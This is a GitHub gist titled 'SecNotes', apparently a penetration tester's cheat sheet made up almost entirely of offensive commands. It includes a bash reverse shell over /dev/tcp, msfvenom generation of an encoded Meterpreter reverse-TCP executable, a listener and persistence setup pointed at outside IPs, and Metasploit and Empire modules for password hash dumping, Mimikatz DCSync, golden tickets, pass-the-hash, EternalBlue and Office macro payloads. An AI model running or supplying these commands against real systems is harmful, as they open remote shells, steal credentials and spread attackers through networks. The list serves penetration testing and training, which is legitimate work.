Created
May 17, 2018 10:40
-
-
Save secfb/d43da7d6b8834137bbf72fcfd66fc0fa to your computer and use it in GitHub Desktop.
SecNotes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| python -c 'import pty; pty.spawn("/bin/sh")' | |
| bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 | |
| msfvenom --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.2.151 LPORT=1515 -e x86/shikata_ga_nai -b "0" -f exe cmd.exe | |
| msfconsole -x "use multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 172.16.154.1; set LPORT 1111; run" | |
| run persistence -A -i 10 -p 6767 -r 192.168.0.24 | |
| use post/windows/gather/hashdump | |
| use post/multi/gather/env | |
| use post/multi/manage/hsts_eraser | |
| use post/multi/recon/local_exploit_suggester | |
| use post/multi/manage/hsts_eraser | |
| use exploit/multi/samba/usermap_script | |
| use exploit/windows/smb/ms17_010_psexec | |
| use exploit/multi/script/web_delivery | |
| use exploit/windows/fileformat/office_word_hta | |
| use exploit/multi/fileformat/office_word_macro | |
| usemodule powershell/situational_awareness/network/powerview/get_domain_controller | |
| usemodule python/situational_awareness/network/active_directory/get_domaincontrollers | |
| usemodule powershell/lateral_movement/invoke_psexec | |
| usemodule powershell/code_execution/invoke_shellcode | |
| usemodule powershell/credentials/powerdump* | |
| usemodule powershell/credentials/mimikatz/pth* | |
| usemodule powershell/credentials/mimikatz/dcsync | |
| usemodule powershell/management/user_to_sid | |
| usemodule powershell/credentials/mimikatz/golden_ticket | |
| usemodule powershell/lateral_movement/invoke_wmi |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment